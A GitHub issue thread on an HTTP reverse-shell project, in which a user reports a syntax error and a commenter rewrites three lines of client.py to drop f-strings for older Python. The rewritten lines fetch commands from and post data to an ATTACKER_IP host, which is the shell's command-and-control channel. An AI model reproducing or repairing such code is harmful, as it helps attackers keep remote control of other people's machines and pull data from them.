### ISSUE TITLE
Syntax Error

### ISSUE THREAD

**Issue by wsococoon** [apurvsinghgautam/HTTP-Reverse-Shell#4]
Hi

I tried to run the code but it says syntax error

![image](https://user-images.githubusercontent.com/87679270/139568585-021bb5e7-1fc6-49e2-9e08-d5a319a16937.png)

**Comment by OmarFawaz** [comment]
This is because the f string is support since python 3.6

You need to amend 3 lines of code in the client.py script 

Line 12
def send_post(data, url=f'http://{ATTACKER_IP}:{ATTACKER_PORT}'):
to
def send_post(data, url='http://{}:{}'.format(ATTACKER_IP, ATTACKER_PORT)):

Line 30
store_url = f'http://{ATTACKER_IP}:{ATTACKER_PORT}/store' # Posts to /store
to
store_url = 'http://{}:{}/store'.format(ATTACKER_IP, ATTACKER_PORT) # Posts to /store

Line 42
command = request.urlopen(f"http://{ATTACKER_IP}:{ATTACKER_PORT}").read().decode()
to
command = request.urlopen("http://{}:{}".format(ATTACKER_IP, ATTACKER_PORT)).read().decode()
